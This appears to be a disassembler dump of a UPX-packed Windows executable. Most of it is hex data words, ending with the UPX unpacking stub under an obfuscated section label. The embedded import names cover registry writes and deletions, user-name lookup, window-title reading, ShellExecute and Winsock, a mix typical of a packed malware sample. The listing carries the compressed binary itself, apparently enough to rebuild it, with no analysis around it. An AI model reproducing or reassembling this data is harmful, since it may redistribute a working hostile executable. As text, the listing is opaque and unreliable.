dd 72657551h, 72655079h, 6D726F66h, 65636E61h, 71657246h
dd 636E6575h, 51010079h, 79726575h, 66726550h, 616D726Fh
dd 4365636Eh, 746E756Fh, 1007265h, 61427349h, 646F4364h
dd 72745065h, 65540100h, 6E696D72h, 54657461h, 61657268h
dd 49010064h, 6974696Eh, 7A696C61h, 69724365h, 61636974h
dd 6365536Ch, 6E6F6974h, 65470100h, 72754374h, 746E6572h
dd 636F7250h, 49737365h, 45010064h, 7265746Eh, 74697243h
dd 6C616369h, 74636553h, 6E6F69h, 70754401h, 6163696Ch
dd 61486574h, 656C646Eh, 65530100h, 72724574h, 6F4D726Fh
dd 1006564h, 61657243h, 754D6574h, 41786574h, 736C0100h
dd 70637274h, 1004179h, 7274736Ch, 6E797063h, 47010041h
dd 6E457465h, 6F726976h, 6E656D6Eh, 72615674h, 6C626169h
dd 1004165h, 7274736Ch, 41706D63h, 654C0100h, 43657661h
dd 69746972h, 536C6163h, 69746365h, 6E6Fh, 0EDh, 16000h
dd 67655201h, 6D756E45h, 756C6156h, 1004165h, 44676552h
dd 74656C65h, 6C615665h, 416575h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 51676552h, 79726575h, 756C6156h
dd 41784565h, 65520100h, 74655367h, 756C6156h, 41784565h
dd 65520100h, 65724367h, 4B657461h, 78457965h, 47010041h
dd 73557465h, 614E7265h, 41656Dh, 79724301h, 65527470h
dd 7361656Ch, 6E6F4365h, 74786574h, 72430100h, 47747079h
dd 61526E65h, 6D6F646Eh, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 43676552h, 65736F6Ch
dd 79654Bh, 0FA00h, 1611400h, 695F0100h, 616F74h, 74735F01h
dd 63696E72h, 100706Dh, 7878435Fh, 6F726854h, 63784577h
dd 69747065h, 1006E6Fh, 74313F3Fh, 5F657079h, 6F666E69h
dd 41554040h, 5A584045h, 5F5F0100h, 46787843h, 656D6172h
dd 646E6148h, 72656Ch, 6D656D01h, 65766F6Dh, 74730100h
dd 79706372h, 725F0100h, 72746Fh, 6F725F01h, 1006C74h
dd 6E73765Fh, 6E697270h, 1006674h, 636D656Dh, 100706Dh
dd 6F6C6F74h, 726577h, 72747301h, 706D63h, 69727001h, 66746Eh
dd 323F3F01h, 50415940h, 40495841h, 3F01005Ah, 5940333Fh
dd 41505841h, 5A4058h, 70737601h, 746E6972h, 5F010066h
dd 69676562h, 7268746Eh, 65646165h, 5F010078h, 65637865h
dd 685F7470h, 6C646E61h, 337265h, 69656301h, 5F01006Ch
dd 6C6F7466h, 78650100h, 1007469h, 6C616572h, 636F6Ch
dd 72747301h, 706D636Eh, 735F0100h, 6972706Eh, 66746Eh
dd 72747301h, 727473h, 63737301h, 666E61h, 6F746101h, 66010069h
dd 6B656573h, 72660100h, 646165h, 706F6601h, 1006E65h
dd 6F6C6366h, 1006573h, 69727766h, 1006574h, 6C657466h
dd 7301006Ch, 61637274h, 6D010074h, 65736D65h, 63010074h
dd 6B636F6Ch, 70730100h, 746E6972h, 73010066h, 636E7274h
dd 1007970h, 636D656Dh, 1007970h, 65657266h, 616D0100h
dd 636F6C6Ch, 74730100h, 6E656C72h, 735F0100h, 6D637274h
dd 6970h, 105h, 161C8h, 0C8FFh, 112h, 161D0h, 65685301h
dd 78456C6Ch, 74756365h, 4165h, 11Eh, 161D8h, 74654701h
dd 65726F46h, 756F7267h, 6957646Eh, 776F646Eh, 73490100h
dd 72616843h, 68706C41h, 6D754E61h, 63697265h, 77010041h
dd 69727073h, 4166746Eh, 65470100h, 6E695774h, 54776F64h
dd 41747865h, 69460100h, 6957646Eh, 776F646Eh, 53010041h
dd 4D646E65h, 61737365h, 416567h, 12900h, 161F400h, 4FF00h
dd 0FF0097FFh, 16FF0001h, 15FF00h, 0FF0002FFh, 5FF0013h
dd 0AFF00h, 0FF0017FFh, 33FF000Ch, 6FFF00h, 0FF0038FFh
dd 3FF0012h, 70FF00h, 0FF0009FFh, 6FF0034h, 0BFF00h, 0FF0010FFh
dd 14FF0008h, 74FF00h, 10011FFh, 49415357h, 6C74636Fh
dd 39FF00h, 0FF0073FFh, 0Dh, 50000000h, 4C000045h, 0F0000301h
dd 463901h, 0
dd 0E0000000h, 0B010F00h, 601h, 160h, 82h, 0F1000000h
dd 167h, 10h, 170h, 4000h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 200h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 0C8000000h, 0A0000173h, 15h dup(0)
dd 70000170h, 2, 5 dup(0)
dd 2E000000h, 74786574h, 0E7000000h, 15Fh, 10h, 160h, 4
dd 2 dup(0)
dd 20000000h, 2EE00000h, 74616472h, 4C000061h, 0Eh, 170h
dd 10h, 164h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 98000000h, 71h, 180h
dd 60h, 174h, 2 dup(0)
dd 40000000h, 0C00000h, 0D80001F0h, 3000176h, 340001F7h
dd 8101820h, 64EEBA04h, 0C3F800D3h, 3EC07F0h, 0A69A69E4h
dd 0D0D8E069h, 0F99DC0C8h, 0B0B8A69Ah, 3C39740h, 0D74D3494h
dd 3B888C34h, 0D36C7480h, 64D34D34h, 50545C60h, 4EEBA69Ah
dd 3B380348h, 0AE202830h, 1869A77Bh, 79714h, 0E99CD98Fh
dd 3C2F8CCh, 0C29300E8h, 9D34D34Dh, 0C4D0DC03h, 4D34ACB8h
dd 8CA034D3h, 17606878h, 30D74D26h, 6720283Fh, 0D74D41DFh
dd 271C244Dh, 8140318h, 36E74D34h, 32FC1FCh, 0D3DCE4F0h
dd 0D8D34D35h, 1FCCD0D4h, 34D34DC8h, 0B0B8C04Dh, 34909CA8h
dd 8434D34Dh, 6068707Ch, 0D967B669h, 98589250h, 1050440Bh
dd 48AEC25Eh, 67C14003h, 0DDF3C138h, 2CBBB085h, 0FBC1240Fh
dd 18140F1Ch, 375D3DDh, 0C0041B0Ch, 8C13C0ABh, 0F05DD74Dh
dd 0DC03E80Fh, 3423C0D0h, 0CC2EEBDDh, 7FF500Fh, 34D3B844h
dd 3B0D74Dh, 9098A0A8h, 5D3CD180h, 0C088578Ch, 8EF853C0h
dd 784B5630h, 0CF74C0A7h, 0AF53C96Ch, 488FABC0h, 0D3BDD34Dh
dd 389B33F0h, 0C65D2830h, 1C133BA6h, 47FC00Ch, 0D8DC9DD7h
dd 8BBFF80Bh, 7D4BFE8h, 0BBB103D0h, 0C4CC4D8Ch, 0BB09BBFh
dd 5D8CBFA4h, 0A0A38577h, 9403981Bh, 8058AFBFh, 0B8CBBB1h
dd 80B7BF84h, 9F0B78B7h, 0B7736170h, 77616C62h, 639B403h
dd 6B2F70E3h, 0B30B6169h, 684CA5A0h, 2BFB6133h, 2B6F3D96h
dd 6F6C7173h, 7DF05011h, 462600Eh, 0B3207h, 0C0AE7Ah, 0C02813FCh
dd 5801454Eh, 0D9BB137Fh, 1D33D9B2h, 6D6F070Bh, 732D96EBh
dd 870F1756h, 0D5FE6B65h, 75D50ACh, 766F6C12h, 9BC8F865h
dd 6E6F6D7Fh, 6C737965h, 74697475h, 16206863h, 755F3F7Ah
dd 788BCA63h, 0FB3B0D9Bh, 673365E7h, 78070B4Eh, 71B6DB6Bh
dd 237A1A77h, 71701500h, 0B9417A61h, 420B7407h, 0C9E4F207h
dd 7807FFEEh, 396B3270h, 0F0B92538h, 651B546Ah, 8A3D506Dh
dd 63470BCDh, 16200D7Eh, 0EF0BC7ECh, 735AD6E8h, 90A79951h
dd 0AE7BAA27h, 4D62A835h, 1983CBDDh, 72F70A16h, 70F7C474h
dd 0F6602549h, 6E17078Bh, 0CE7AEB75h, 61B5ACDAh, 46C98D0Ah
dd 0DD606D13h, 2B0E1DD9h, 35B47473h, 338A1707h, 2D3134C8h
dd 8D7E6572h, 0F6217362h, 61371579h, 56218264h, 6543ED02h
dd 243B0123h, 0B30C220h, 92E4B60Ch, 70000h, 9C9C9B9Ch
dd 7030000h, 0E6B70A10h, 70277A0Bh, 8BEB4F77h, 7DECC3Dh
dd 0F61EB27h, 2D97151Eh, 0BE900A1h, 0E7381731h, 7032B22h
dd 0B737840Bh, 211FBD05h, 5C0D0974h, 43081E44h, 75636FE1h
dd 53175704h, 0D0FC2A0Bh, 5C736DDDh, 2B6B2C41h, 73ECBB5Bh
dd 0ED305C20h, 2441376Dh, 741AC6Ah, 4164725Ch, 63F30B68h
dd 0D13C20Bh, 376D65D8h, 270011h, 923172A1h, 934B571Fh
dd 9F60325Bh, 630B64BCh, 0F68EC223h, 3131B9Eh, 0AF666622h
dd 2346ABB7h, 7729C315h, 0CE4A056Eh, 75173E15h, 65DD5292h
dd 0D629878Fh, 1B865B12h, 7551C39Eh, 0F969AB11h, 44BB9A49h
dd 636F205Dh, 8CDA6569h, 86C38CFh, 0CF71613Ch, 6A696323h
dd 73B5373Ch, 6269AF12h, 0F6F636Dh, 0AB775262h, 0B37B612Fh
dd 1E92C2h, 0B58F8BF3h, 6F367416h, 13266769h, 2EF6D51Ch
dd 0A3707533h, 2B126EA2h, 5F9DA39Bh, 6B3335CBh, 0B11AD479h
dd 87370759h, 68C5AC65h, 28C455EDh, 0F7179FABh, 75E336B6h
dd 73184190h, 0D6EFCB8Fh, 0E7193466h, 72622293h, 0C1B9A911h
dd 73759B76h, 0B3A36507h, 0A44284BEh, 2DF6B6Ah, 0A46F4E17h
dd 826F6A76h, 0D71769DFh, 0CE137361h, 1F5A66E7h, 3B086A16h
dd 175B8218h, 0E667626Fh, 0B5CF7C2Fh, 415983D3h, 0D968DF04h
dd 65B606F0h, 656B070Bh, 0B6015272h, 65033B37h, 20A690BBh
dd 0C0FB115h, 0A0578423h, 0F67875CCh, 0BDEC6F06h, 9A756CC7h
dd 7700353h, 0E41686B0h, 74C4F173h, 0D818570Bh, 1B727B36h
dd 52FD406Dh, 740FB2E4h, 2D20311Ah, 8C060A0Dh, 3207B262h
dd 60A42DE3h, 54460A42h, 4A0542h, 23FBFF21h, 0A38A325Bh
dd 2D364B87h, 0F5FFFA0Bh, 20332078h, 686620D1h, 32303120h
dd 0DC4A2034h, 5BB914BFh, 123A3067h, 7772648Ch, 6E907278h
dd 72246D91h, 42D2827h, 920DAC0Dh, 0D8F65E26h, 35316B83h
dd 0CFA07B30h, 33318F13h, 230F142h, 0D702501Bh, 4B6C2DD9h
dd 1F022C13h, 0E4BB5620h, 32342FB1h, 0BD84B35h, 8F5F3015h
dd 103E4BFDh, 37350C41h, 222F2220h, 2B02017h, 60D8F202h
dd 0E0873173h, 0E4F60A6Bh, 0A04FCF92h, 9833162Fh, 92E16310h
dd 33335F23h, 20C2A831h, 0DE20C6A3h, 0A7333019h, 0C20C5931h
dd 0CB2FD3CDh, 44803E0Fh, 46E327BDh, 23205054h, 0E6BA952Ah
dd 9DB8056Dh, 0D55D72Fh, 0FB0130BBh, 604A976Ch, 6B04A120h
dd 8E1780Bh, 0E0F6008h, 241B0C0h, 86444B57h, 69544828h
dd 6DA08393h, 5C89749Eh, 0B6409B2Fh, 54748F28h, 0D812298Bh
dd 1FCF1400h, 15AA278Ah, 5EDC811Ch, 0C119FE80h, 0FF3174FFh
dd 0EBF9E200h, 8FE6E805h, 8B64DB33h, 0F8833043h, 70A0889Bh
dd 788BAD1Ch, 0FB99E808h, 6C8552FFh, 5C8B3C5Fh, 0DF03783Bh
dd 205B8B53h, 0FA374205h, 4C383BFh, 0F703338Bh, 32ACC933h
dd 0D505C1B9h, 0FFFF6FFCh, 0CA2BF675h, 2B58E975h, 5EEBD1D8h
dd 28245E03h, 8B0B8B66h, 0DF031C5Eh, 0E078028Bh, 5EC703BFh
dd 5EE0FF5Bh, 1268A868h, 0E46FFD14h, 6E92BA54h, 0D6FF8404h
dd 0DBA4F88Bh, 0EC78A006h, 83BAA453h, 0C47F0057h, 0AC15685Ah
dd 8B1C0568h, 0F6F98BD4h, 6AD8FFDBh, 0BA535210h, 5A603063h
dd 2B4501Ah, 0C5550h, 8E26058h, 0BF609EC0h, 0B7B3E543h
dd 536C2FCBh, 0A69000AFh, 0B95040C2h, 0E6EC3B7Ah, 0A173CCEEh
dd 69D31009h, 0C033202Ah, 25BBBCC7h, 5443AF02h, 7972328Ch
dd 0EDDDB019h, 7D8166BFh, 75111102h, 220406EDh, 0AAE47500h
dd 96C010BDh, 8B370015h, 0B59FEA75h, 0EB392FFh, 45D89ECh
dd 894F1989h, 61451465h, 1BC7646Dh, 21A171CAh, 8DF8FD80h
dd 6CA25504h, 781C4128h, 7745E066h, 0C5D822F8h, 0A30D7B90h
dd 14643DB0h, 2E18458Fh, 69BE02h, 0C03B7F7Eh, 3DBA1836h
dd 495C6BD3h, 0C268401Ch, 3702A158h, 1700A60Ch, 438ABECh
dd 0FD9F4DFFh, 8B22A0EFh, 577441C8h, 104D8D53h, 0BA1C1E51h
dd 777F97B9h, 0CBF5BEE5h, 0C5EB401Bh, 0C5935C0Fh, 0EE446A9Dh
dd 0C96FED0Bh, 8BFC8BE0h, 654BABD7h, 0FDE2AB59h, 0DFE5FF40h
dd 505252ECh, 0F12C7600h, 0FE582694h, 0BA5053C7h, 63DFD601h
dd 0DE34DACBh, 53963D0Bh, 0C7627CFh, 7F91FB77h, 31568583h
dd 46BABA07h, 9C10Ch, 0AEA7E3h, 13E66AC7h, 1BCCF81Ch, 0D20CD203h
dd 0CCD80B7Ch, 0CD2A0ACh, 78840CD2h, 0DF14C58h, 28340CD2h
dd 7CC070Ch, 274594F9h, 0DAEAF6CAh, 0F60FA68Ah, 80B0FFFFh
dd 0ACBCBDBBh, 99C590B1h, 0C99ABFF1h, 86F7B191h, 0FA27A0ADh
dd 3E5FD0EAh, 91630018h, 0A191B0A3h, 0ACDF93AAh, 9EFF63EAh
dd 88DAB2E5h, 17B4AD9Ah, 0DBEFF5CEh, 0FFFFE6B7h, 0A9BB941Fh
dd 0A1FAA489h, 0DA97B2BAh, 86A4A4C2h, 0B8B28BD3h, 0BCA1A084h
dd 63C93FFFh, 0E0F0CB2Bh, 87BEA397h, 0A9BAFAA7h, 9FC29FA5h
dd 0D9C97FE5h, 0C381BEFFh, 0C6ACB590h, 77A0B1A6h, 0BEAB8EFBh
dd 0AAE1BA8Dh, 0B6FAFFFEh, 0DD95A3A4h, 81B2FE82h, 0BAA69BD5h
dd 265BC79Bh, 0FB67487Bh, 0C68DA3EBh, 0B583B26Eh, 0B1A0A77Fh
dd 0F4D88E92h, 0DCEA737Ah, 0EDFFB0EBh, 90AAAB7Fh, 0A6B1B1BCh
dd 0F3C399ECh, 9DC281A2h, 0BC8DB7ECh, 0F178001Bh, 73621345h
dd 0C0B00C88h, 906C0327h, 2B6A6001h, 9C45FF24h, 9D0D7589h
dd 0FA85B6A1h, 213C8438h, 49ECF1C8h, 7F90306h, 3903C15Bh
dd 98ADA797h, 95BCA0A9h, 0CDC8539Dh, 0B52F6h, 5A0136D0h
dd 0B155070Eh, 98D52E78h, 70414F29h, 587372Fh, 70B66D0h
dd 0EC2C2D52h, 4949F014h, 13E72F53h, 3847AABCh, 3A151Fh
dd 1962654Fh, 2FC64B05h, 2A58288Dh, 8353C178h, 45302A6Eh
dd 0ABA10CBh, 0E148E126h, 1204D2Eh, 9BB940A2h, 0B03BF67Dh
dd 3B290D57h, 0BC222273h, 62CF1081h, 51ECB7D0h, 54A427CBh
dd 4EF60562h, 8F5D6F50h, 2062562Ch, 0C22C2B6Ch, 0E184AD1Ch
dd 40F75DAh, 2D65876Bh, 0EE8401C8h, 87D54E33h, 7469C080h
dd 0B2D88B68h, 1B05E6F6h, 0C5CC6FF8h, 7D38160Bh, 95A0338Dh
dd 91561054h, 223DACADh, 9C3A7300h, 5AB611A9h, 306C7927h
dd 0D419661h, 0DA5B24C0h, 87A9EC1Bh, 0BC732545h, 0AAC55404h
dd 28730936h, 83652D05h, 1B1F6585h, 59301088h, 12E96348h
dd 0A08040D2h, 4551886Eh, 59827F8Ah, 155EAE05h, 0A2756363h
dd 5984B6B2h, 8EAD3BB0h, 41421B39h, 2008854Bh, 2464EC1h
dd 686D7572h, 0B096B0B1h, 8A235143h, 96300378h, 193AAEB7h
dd 0B0C0DACBh, 0C9AF7833h, 7506C25Eh, 11D561Ah, 0DDE096Fh
dd 41FF65D0h, 5B617B99h, 3341793Ch, 34417A36h, 0FA5FA97Fh
dd 68456438h, 6867B566h, 0ED675247h, 6C553568h, 0A97F7644h
dd 33D8E0h, 0D46C46B7h, 5C505846h, 1A026973h, 2E1010B0h
dd 5600BAE0h, 7716B0F6h, 354E0B67h, 9B066300h, 0D81B0C41h
dd 94012E30h, 25E87D4Bh, 6C4F538Dh, 8F7DC141h, 623F1843h
dd 0D48B5870h, 11D2868h, 0C3D12D0Ch, 935C1C08h, 1E5C315Ch
dd 1349810Bh, 25876ABBh, 2F4C901Bh, 462045E6h, 108290h
dd 0A201C148h, 45215B25h, 0CDB172E4h, 4002A610h, 0DDAB1305h
dd 0AFCF2156h, 253D3C50h, 3B443347h, 7038180h, 8660690Fh
dd 0F715003h, 6DF95E2Fh, 5B000D59h, 5D5E5B25h, 61B0D90Ch
dd 3B434BC3h, 24ECAC33h, 0DB5BC388h, 3B290ECAh, 1460CAD9h
dd 532B6D09h, 5A6C3265h, 483041Fh, 20A22013h, 18210AFDh
dd 45491F36h, 1D86413Ah, 6F782EACh, 5020F543h, 1830087Dh
dd 2DDD4C00h, 0C348161Bh, 4882132Bh, 205B8136h, 1BD81C5Ch
dd 596C895Bh, 444A0846h, 42B0B104h, 5CB44654h, 0A587E16Ch
dd 9706072Fh, 466CE34h, 234906E7h, 56F0B887h, 3631650Bh
dd 9F353588h, 65FD8763h, 4E534D77h, 2DF94520h, 17490Eh
dd 0B844B2A6h, 3962B72Ch, 0F3B0B61Dh, 63393138h, 232D31C7h
dd 1356612h, 2B1F7174h, 35F6EC2Eh, 65653765h, 4F633030h
dd 2AB9CCD5h, 5C7CB617h, 412E054Ch, 35642702h, 452E3033h
dd 64C731A4h, 85B7825h, 0F24615Dh, 43767B73h, 6F1E3FF1h
dd 0D02DB15Ah, 0F3398C11h, 30496B12h, 148CB636h, 60652380h
dd 60A90DD6h, 7456B83Eh, 0DA178204h, 2BF42175h, 4218202Bh
dd 6E277283h, 8A483972h, 13758182h, 106D4E53h, 3550BB71h
dd 664F8563h, 18726108h, 6D05A958h, 73681CB4h, 54BF1801h
dd 60A16E1Eh, 57851821h, 0DB58BD13h, 7665560Eh, 96DB5805h
dd 87648284h, 0B716A22Bh, 3C53715Ah, 0B4365C8Bh, 0B5BB2D80h
dd 7075EA2Ch, 0DCCAC320h, 74DFA660h, 109C4B5Dh, 135CCC0Ah
dd 6A6C4AD7h, 17909188h, 0D34CDAB7h, 38B8574h, 9028303Ch
dd 0FB0641h, 0C14071Ch, 641C9C83h, 0ECD9F400h, 0C82F90E4h
dd 0D80BE020h, 6C190641h, 0BCC807D0h, 90641935h, 4EA4ACB4h
dd 34EFC9Eh, 90D99873h, 641980D9h, 747C4190h, 0B0727268h
dd 58435C01h, 20C850D9h, 40480C83h, 0C80D838h, 1C283032h
dd 0C83219Fh, 40C1432h, 0D9C9800Ch, 0BF407D8h, 90018200h
dd 45E8DE4Bh, 8C433330h, 61204349h, 0CBA2C351h, 785158C3h
dd 0D764A7A0h, 0E4E6D9Fh, 20077536h, 6C632D75h, 2B8407Bh
dd 7BC2980h, 0B128ED32h, 13BB7973h, 8992432Dh, 0AADB7A36h
dd 48530B3Ah, 0D639DC2Dh, 983FC689h, 6C00350Bh, 6900702Fh
dd 8BDBE805h, 278AC566h, 0CE686C02h, 2E0761C1h, 0E8505BCCh
dd 8A96F905h, 62D0779h, 90F344CFh, 752074B3h, 6D4597BCh
dd 0E78BD42h, 6E48095Fh, 3D07B3D8h, 8908133Dh, 6F014836h
dd 4F3D0F13h, 1BB6620Bh, 4D3A2015h, 0DEFA8544h, 796669FBh
dd 4D07A350h, 0FB304133h, 700B485Eh, 0D9BE5A07h, 4F6D3B9Bh
dd 2F705308h, 0C54AD4Ch, 49F8061Ch, 5484D64h, 26623AA6h
dd 3EC4F7ACh, 77327548h, 0CB60E65h, 8E6C8096h, 136E7342h
dd 8DD14C08h, 534DD367h, 28337B22h, 3089E403h, 0FB050BFEh
dd 0B8A0BAE6h, 91C499ECh, 0FFD43B03h, 790F4CFFh, 35C08B1h
dd 0E3F4F66Fh, 0A8C30C12h, 12FBCA1h, 18B28248h, 61C277DEh
dd 0FDC6FF44h, 0EBF7D7E6h, 23AFF7EBh, 0B594532Eh, 0DA00CAAAh
dd 0FF25442Ah, 0B881B1E1h, 0EBF7BDh, 0A78247FFh, 8E96622Eh
dd 0A48BBBA7h, 0A6E6E6E7h, 84A88F9Ah, 0D356DAA2h, 0F30A2482h
dd 0BB80B6FFh, 0B1E6A7B0h, 0FE85DE92h, 712DFBFh, 69658782h
dd 3CAF070h, 0EE8396C1h, 0FE1652Eh, 6C45E068h, 0EE700179h
dd 0A85145CDh, 7F2EF73h, 8A275CA3h, 0CC4D706Eh, 0DE001E58h
dd 3A490F20h, 8A45DC8Dh, 25780525h, 4BFF3378h, 3069B81h
dd 0B3D60FBh, 1B548FDFh, 527F8E10h, 2B6597D1h, 0AFBC19D1h
dd 56413F2Eh, 6081AA5Fh, 655F1D03h, 60840F0h, 1F37AC36h
dd 1A0A39A8h, 1E875FDCh, 0A9200A21h, 1051541Eh, 51B3756h
dd 57E0C44Dh, 40476A60h, 65A88415h, 0F5408BF1h, 4C0E4DCFh
dd 7B61636Fh, 4109ED0Fh, 444E53A5h, 0EAA90569h, 0AD638836h
dd 446C1579h, 5B660A93h, 0E72F6E22h, 6068A325h, 4CF65D1Fh
dd 9229BD0h, 2C0C4FA9h, 195BD142h, 77DE3B76h, 4C010D44h
dd 61726269h, 1D4440Dh, 417B22F5h, 8B5B62C7h, 69A40F5Ah
dd 6F430C10h, 0D97B5117h, 4C647970h, 0A1064A61h, 0DB7B378h
dd 7E697257h, 3D9B7070h, 506876D9h, 5097688Eh, 0D97C7069h
dd 365BD516h, 0BD38124Fh, 305B2D9Bh, 65500F20h, 0D5476B65h
dd 641AF64Bh, 66699043h, 44326A85h, 537A9952h, 0AFA830D1h
dd 50646E87h, 13C14EBDh, 0A03584B0h, 0C3CBC4Fh, 614339BBh
dd 0C010164Dh, 6706529h, 60024D96h, 4A68F454h, 0E28A92C2h
dd 5B73F657h, 62FAA621h, 6544ACC0h, 908AA210h, 8FD58584h
dd 0E9F60D51h, 14354D4h, 0B0B06E55h, 616DFFB3h, 65695670h
dd 0B6664F77h, 54CF0E4Dh, 18CB96E4h, 0D547C7E7h, 627A6DACh
dd 0AF49A14Dh, 75427501h, 6241443Ch, 0A80E186Ah, 334EA053h
dd 1503D413h, 2C680EB4h, 63F90BAAh, 1F01E46Bh, 0CFA9ED50h
dd 6E470350h, 6BB414ECh, 75713A31h, 37681A20h, 6531A58Ch
dd 427349D9h, 0A12D92B4h, 14E86F45h, 108C20CCh, 9DEF5EAAh
dd 490DD7B2h, 2A55452Fh, 40C67544h, 5D6F0588h, 824C3359h
dd 4D11BC21h, 0B2D2E265h, 630BD3C6h, 76160987h, 5A0B635Bh
dd 6D4DD576h, 0C6615670h, 61D44730h, 0A56223D6h, 90876D91h
dd 97A57644h, 9A71B545h, 670900EDh, 0C2ADBDC1h, 377592C3h
dd 3F87CE0Eh, 39103602h, 6879654Bh, 78458B0Dh, 111E330Eh
dd 0CC259B0Dh, 32B80FB6h, 0D8CB440Dh, 0E97355A3h, 0D7585266h
dd 45627250h, 74DB6E6Dh
dd 79AC1C14h, 526EE229h, 410F6D61h, 586CC763h, 24D9A52Bh
dd 66B58B59h, 0C058BDB3h, 5F6114FAh, 9C15CED9h, 0F006C92Bh
dd 2C0AF294h, 43E196B4h, 2BA87878h, 7F707F7Eh, 6A27C409h
dd 0AE313F3Fh, 40454155h, 0E35C1358h, 2A295AB9h, 6681990Eh
dd 0EA0CDA28h, 8C06D0Ah, 84DCD1EFh, 2482364h, 808FB106h
dd 73766C9Bh, 2A66AB6Eh, 62D6DEF7h, 77957F6Fh, 0F910323Bh
dd 20B37FFEh, 59403274h, 58415041h, 0D5A4049h, 7B587B33h
dd 0D0E58AEh, 625F2547h, 316BACD7h, 0E859095Ch, 0FBB6650Fh
dd 5F7676B6h, 11339268h, 667A690Eh, 0D8640368h, 691D069Ah
dd 0CD96D131h, 637536C6h, 98F56E73h, 0E73A8A57h, 73070213h
dd 0B9C30F95h, 38615B2Eh, 54736669h, 9D0EC106h, 0D50630A1h
dd 0AC516306h, 7EAF735h, 407CA77h, 0AE75C957h, 0E235DAC5h
dd 6325071Dh, 0CC97877Bh, 1D75B33Bh, 2C0C0720h, 3D55DEEBh
dd 59B6946Dh, 9413742Eh, 5AE699Ch, 0EA2C801h, 0C8FFB6CDh
dd 0BAD0120Bh, 0F44188D6h, 171A6DC4h, 0CD381D04h, 81C9D81Eh
dd 0D3A22182h, 0BBF602C8h, 9134E8ABh, 706C4177h, 40470E05h
dd 97AF4E63h, 4181C612h, 219177B0h, 60C52D54h, 3B496B58h
dd 41EFBA5Eh, 4E4D08B4h, 0F48C2968h, 7B659659h, 1970204h
dd 59651516h, 13026596h, 96170A05h, 0C965965h, 12386F33h
dd 65965903h, 34097059h, 596D0B06h, 8106596h, 0FD117414h
dd 0F28EDB2Ch, 49415357h, 239FF25h, 0FF210D73h, 501649E5h
dd 3014C45h, 3901F000h, 0E91D9E46h, 0B010F97h, 820601h
dd 67F11382h, 0E882D937h, 707C100Bh, 24B0D0Bh, 75602C4h
dd 818A3DF6h, 10284F14h, 82C2C207h, 2766E58h, 73CB5584h
dd 856968A0h, 70A7EC51h, 41B6F202h, 0D7DD905Fh, 4EB5FE7h
dd 91F0158h, 722EE012h, 17802BC0h, 0FB0E4CECh, 58B7D92Bh
dd 4002D973h, 9827262Eh, 0D3494C71h, 74608034h, 0D97C00C0h
dd 76466830h, 1F703h, 0
dd 12000000h, 0FFh, 0
; ---------------------------------------------------------------------------
loc_421AA0: ; CODE XREF: _7hdaygc1:loc_4286D4�j
pusha
mov esi, offset dword_417000
lea edi, [esi-16000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_421AC2
; ---------------------------------------------------------------------------
align 8
loc_421AB8: ; CODE XREF: UPX1:loc_421AC9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_421ABE: ; CODE XREF: UPX1:00421B56�j
; UPX1:00421B6D�j
add ebx, ebx
jnz short loc_421AC9
loc_421AC2: ; CODE XREF: UPX1:00421AB0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421AC9: ; CODE XREF: UPX1:00421AC0�j
jb short loc_421AB8
mov eax, 1
loc_421AD0: ; CODE XREF: UPX1:00421ADF�j
; UPX1:00421AEA�j
add ebx, ebx
jnz short loc_421ADB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421ADB: ; CODE XREF: UPX1:00421AD2�j
adc eax, eax
add ebx, ebx
jnb short loc_421AD0
jnz short loc_421AEC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_421AD0
loc_421AEC: ; CODE XREF: UPX1:00421AE1�j
xor ecx, ecx
sub eax, 3
jb short loc_421B00
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_421B72
mov ebp, eax
loc_421B00: ; CODE XREF: UPX1:00421AF1�j
add ebx, ebx
jnz short loc_421B0B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B0B: ; CODE XREF: UPX1:00421B02�j
adc ecx, ecx
add ebx, ebx
jnz short loc_421B18
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B18: ; CODE XREF: UPX1:00421B0F�j
adc ecx, ecx
jnz short loc_421B3C
inc ecx
loc_421B1D: ; CODE XREF: UPX1:00421B2C�j
; UPX1:00421B37�j
add ebx, ebx
jnz short loc_421B28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_421B28: ; CODE XREF: UPX1:00421B1F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_421B1D
jnz short loc_421B39
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_421B1D
loc_421B39: ; CODE XREF: UPX1:00421B2E�j
add ecx, 2
loc_421B3C: ; CODE XREF: UPX1:00421B1A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_421B5C
loc_421B4D: ; CODE XREF: UPX1:00421B54�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_421B4D
jmp loc_421ABE
; ---------------------------------------------------------------------------
align 4
loc_421B5C: ; CODE XREF: UPX1:00421B4B�j
; UPX1:00421B69�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_421B5C
add edi, ecx
jmp loc_421ABE
; ---------------------------------------------------------------------------
loc_421B72: ; CODE XREF: UPX1:00421AFC�j
pop esi
mov edi, esi
mov ecx, 9C1h
loc_421B7A: ; CODE XREF: UPX1:00421B81�j
; UPX1:00421B86�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_421B7F: ; CODE XREF: UPX1:00421BA4�j
cmp al, 1
ja short loc_421B7A
cmp byte ptr [edi], 6
jnz short loc_421B7A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_421B7F
lea edi, [esi+1F000h]
